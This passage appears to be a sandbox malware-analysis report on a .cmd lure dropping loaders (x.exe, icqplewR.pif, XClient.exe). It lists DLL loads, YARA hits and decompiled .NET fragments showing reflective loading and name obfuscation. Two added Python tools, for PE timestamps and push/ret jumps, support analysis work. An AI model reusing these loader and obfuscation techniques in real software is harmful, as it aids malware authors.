Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: uxtheme.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: mscoree.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: wldp.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: amsi.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: userenv.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: profapi.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: version.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: msasn1.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: gpapi.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: cryptsp.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: rsaenh.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: cryptbase.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RFQ_HB648836_Enquiry.cmd Static file information: File size 1870427 > 1048576
Source: Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: icqplewR.pif, 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1381377846.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1436995878.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1205441850.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1205441850.0000000001F7A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 3.2.x.exe.3a2e118.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.x.exe.3a2e118.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.x.exe.3f50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1225628768.0000000003A2E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs .Net Code: Type.GetTypeFromHandle(MIOq0J32PYx10ZCZDTi.Eh9xfRPw4r(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(MIOq0J32PYx10ZCZDTi.Eh9xfRPw4r(16777255)),Type.GetTypeFromHandle(MIOq0J32PYx10ZCZDTi.Eh9xfRPw4r(16777285))})
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs .Net Code: Type.GetTypeFromHandle(bFRlLegYq2FtqtTJBjG.CcFylhPt3u(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(bFRlLegYq2FtqtTJBjG.CcFylhPt3u(16777255)),Type.GetTypeFromHandle(bFRlLegYq2FtqtTJBjG.CcFylhPt3u(16777285))})
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.3.icqplewR.pif.296c7830.0.raw.unpack, ClientFactory.cs .Net Code: RequestLogicalClient System.AppDomain.Load(byte[])
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, Messages.cs .Net Code: Memory
Source: icqplewR.pif.3.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
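The compile stamp above decodes to a date in 2054, i.e. later than the analysis itself. The following added example (not part of the Joe Sandbox report and not the sample's own bytes) shows how to pull IMAGE_FILE_HEADER.TimeDateStamp out of a PE and flag a zero or future value. It constructs a minimal MZ/PE header carrying the stamp 0x9E9038DB so it runs offline; the baseline date used for "now" is an assumption passed in by the caller.

```python
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_I386 = 0x014C


def build_fake_pe(time_date_stamp: int) -> bytes:
    """Constructed minimal MZ/PE image (assumption: not the sample's real bytes).
    DOS header with e_lfanew -> 'PE\\0\\0' + the 20-byte COFF file header."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew at 0x3C -> 0x40
    coff = struct.pack("<HHIIIHH",
                       IMAGE_FILE_MACHINE_I386,  # Machine
                       3,                        # NumberOfSections
                       time_date_stamp,          # TimeDateStamp, seconds since the Unix epoch
                       0, 0,                     # PointerToSymbolTable, NumberOfSymbols
                       0xE0,                     # SizeOfOptionalHeader (PE32)
                       0x0102)                   # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    return dos + b"PE\0\0" + coff


def read_timestamp(pe: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp after validating both signatures."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF header starts right after the 4-byte signature; TimeDateStamp is its third
    # field, at +4 (after Machine and NumberOfSections).
    (stamp,) = struct.unpack_from("<I", pe, e_lfanew + 4 + 4)
    return stamp


def format_utc(stamp: int) -> str:
    """Same rendering the report uses, e.g. 'Sun Apr 19 22:51:07 2054 UTC'."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def check_timestamp(pe: bytes, now_epoch: int, slack_seconds: int = 86400) -> dict:
    """Flag a stamp that is zero or lies more than a day after the caller's 'now'.
    A day of slack tolerates ordinary build-clock skew without hiding a forged date."""
    stamp = read_timestamp(pe)
    return {
        "stamp": stamp,
        "utc": format_utc(stamp),
        "zero": stamp == 0,
        "in_future": stamp > now_epoch + slack_seconds,
    }


if __name__ == "__main__":
    import time
    sample = build_fake_pe(0x9E9038DB)   # the stamp quoted in the report
    print(check_timestamp(sample, int(time.time())))
```

One caveat before treating a future stamp as evidence on its own: icqplewR.pif is a .NET binary, and Roslyn's deterministic builds write a content hash into TimeDateStamp rather than a wall-clock time, so legitimately compiled .NET assemblies also carry nonsensical dates. The check is useful for native packers such as the Delphi-style x.exe stage, and for .NET it should be read together with the other obfuscation findings in this section.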
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 3_2_03F63E20
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F762A4 push 03F7630Fh; ret 3_2_03F76307
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F53210 push eax; ret 3_2_03F5324C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F761F8 push 03F76288h; ret 3_2_03F76280
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5C1C6 push 03F5C61Eh; ret 3_2_03F5C616
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5617C push 03F561BEh; ret 3_2_03F561B6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5617A push 03F561BEh; ret 3_2_03F561B6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F76144 push 03F761ECh; ret 3_2_03F761E4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F760AC push 03F76125h; ret 3_2_03F7611D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6606C push 03F660A4h; ret 3_2_03F6609C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6A018 push ecx; mov dword ptr [esp], edx 3_2_03F6A01D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5F600 push 03F5F64Dh; ret 3_2_03F5F645
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5F5FF push 03F5F64Dh; ret 3_2_03F5F645
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5F4F4 push 03F5F56Ah; ret 3_2_03F5F562
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5C498 push 03F5C61Eh; ret 3_2_03F5C616
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F62410 push ecx; mov dword ptr [esp], edx 3_2_03F62412
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F75854 push 03F75A3Ah; ret 3_2_03F75A32
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F69FB4 push ecx; mov dword ptr [esp], edx 3_2_03F69FB9
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63F84 push 03F63FBCh; ret 3_2_03F63FB4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F62EDC push 03F62F87h; ret 3_2_03F62F7F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F62EDA push 03F62F87h; ret 3_2_03F62F7F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5BE18 push ecx; mov dword ptr [esp], edx 3_2_03F5BE1D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5CDE0 push 03F5CE0Ch; ret 3_2_03F5CE04
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F55DA0 push 03F55DFBh; ret 3_2_03F55DF3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F55D9E push 03F55DFBh; ret 3_2_03F55DF3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63D40 push 03F63D82h; ret 3_2_03F63D7A
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0041C40C push cs; iretd 9_1_0041C4E2
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00423149 push eax; ret 9_1_00423179
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0041C50E push cs; iretd 9_1_0041C4E2
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004231C8 push eax; ret 9_1_00423179
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0040E21D push ecx; ret 9_1_0040E230
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0041C6BE push ebx; ret 9_1_0041C6BF
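The push/ret listing above is the shape of an obfuscated jump: the pushed immediate is the real destination and the ret transfers control to it, which breaks naive static call-graph and cross-reference recovery. The scanner below is an added example, not code from the report, the sample, or Joe Sandbox's disassembler. It walks a 32-bit code dump for adjacent `push imm32; ret` and `push r32; ret` pairs and keeps only immediates that land inside the image. The byte buffer is constructed so that its first hit reproduces the reported `3_2_03F762A4 push 03F7630Fh`; the image bounds are assumed. Note that the sandbox pairs a push with a ret that may sit several instructions later (the listed ret addresses are not adjacent to the push), which this byte-level heuristic does not attempt.

```python
"""Scan a 32-bit code dump for push/ret pairs used as obfuscated jumps.

Added example for this report, not the sample's code and not Joe Sandbox's
disassembler. The byte buffer is constructed to reproduce the shape of the
x.exe findings above; the addresses are chosen so the first hit matches
the reported `3_2_03F762A4 push 03F7630Fh`.
"""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Constructed sample (assumed image bounds; not taken from the sandbox dump)
IMAGE_BASE, IMAGE_SIZE = 0x03F50000, 0x30000
SAMPLE_VA = 0x03F762A0
SAMPLE = (
    b"\x90\x90\x90\x90"             # nop padding
    b"\x68\x0F\x63\xF7\x03\xC3"     # push 0x03F7630F ; ret   -> jmp 0x03F7630F
    b"\x50\xC3"                     # push eax ; ret          -> jmp eax
    b"\x68\x00\x00\x00\x00\xC3"     # push 0 ; ret            -> outside image, ignored
)


def find_push_ret(code: bytes, code_va: int, image_base: int, image_size: int):
    """Return (imm_hits, reg_hits).

    imm_hits: [(va_of_push, target)] for `push imm32 ; ret` where target lies inside
              [image_base, image_base + image_size); this is a disguised `jmp target`.
    reg_hits: [(va_of_push, reg)] for `push r32 ; ret`, a disguised `jmp r32`.
    Byte-level heuristic: it does not disassemble, so matches inside data or
    inside a longer instruction are possible, and a ret placed several
    instructions after its push (as in the sandbox listing) is not paired.
    """
    imm_hits, reg_hits = [], []
    end = image_base + image_size
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        if op == 0x68 and i + 6 <= n and code[i + 5] == 0xC3:
            (target,) = struct.unpack_from("<I", code, i + 1)
            if image_base <= target < end:
                imm_hits.append((code_va + i, target))
            i += 6
            continue
        if 0x50 <= op <= 0x57 and i + 2 <= n and code[i + 1] == 0xC3:
            reg_hits.append((code_va + i, REG32[op - 0x50]))
            i += 2
            continue
        i += 1
    return imm_hits, reg_hits


if __name__ == "__main__":
    imm, reg = find_push_ret(SAMPLE, SAMPLE_VA, IMAGE_BASE, IMAGE_SIZE)
    for va, target in imm:
        print(f"{va:08X} push {target:08X}h; ret   (jmp {target:08X})")
    for va, r in reg:
        print(f"{va:08X} push {r}; ret            (jmp {r})")
```

On a real dump, feed the section bytes with the section's virtual address and the image base and SizeOfImage from the optional header; treat a dense cluster of hits as the signal, not a single match.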
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, Hyq4Brhw78ApZ4SE3ZB.cs High entropy of concatenated method names: 'Uqohxn7GrP', 'gbVh4r6IUF', 'cUoh8g8Vev', 'oDEhBc1I4Q', 'gFDhnAa9Q1', 'Uo9hM1GoGP', 'LhEhqSVXhg', 'kvdhzoJ6NM', 's2sLYqj9jB', 'S8KLpIli9g'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs High entropy of concatenated method names: 'nrmCNZJKJMZGr53L14D', 'WipnH9JguXIINcDUbYP', 'oux37lIeh3', 'vh0ry9Sq2v', 'sdL3UQoZ1A', 'tvQ3CcOtyW', 'doC3Q6AC0m', 'Jxk3G20AqH', 'm8OxmVCREy', 'fL3Lvwdva0'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, JTOrHY3Mxp4brY4ZQrs.cs High entropy of concatenated method names: 'jiJoqIxPcB', 'oB3ozIsycD', 'CtltYiLVvQ', 'mLXtp5JLX6', 'QgRtIaU2ao', 'gmAtD0YHHv', 'Ay9t0kc90K', 'LIs5tqXOKm', 'yNEtWhS55q', 'JgCtKbEAi9'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, fGAvyepf0iGWHUqWKm4.cs High entropy of concatenated method names: 'OexpLRBMFk', 'P0Lp34aEf1', 'MekpUpfQk3', 'fxspQSyFDA', 'e3PpsC2x6w', 'M4CptGHQcv', 'sJPpF2gFSb', 'JUbp9Rf3pq', 'tyQpOY42s6', 'FO3pA8xa3T'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, YUMqjF3jsWoBEsr5Fwg.cs High entropy of concatenated method names: 'Jht3wYt30B', 'k0C3NuAhZj', 'hr23J9YM3D', 'eSL3PGE9cX', 'mI73r1Z0Ks', 'YhG3xENuJK', 'Pv234TXcDM', 'G6W38ALBMx', 'j5Q3BPkhX0', 'GBp3nSTTja'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, ydlZiQf84uhWGsAUM1E.cs High entropy of concatenated method names: 'h3bhQEXMTq', 'I5YhGCQIgG', 'x3FhsRChge', 'zEciLSNOoAR4kKC3pPR', 'AUy50QNS3V1824yTsoD', 'unZfnrMvxa', 'IxOfMhgSy0', 'AWOfqqZKgD', 'DxofzdtOBP', 'RYehYqcDQC'
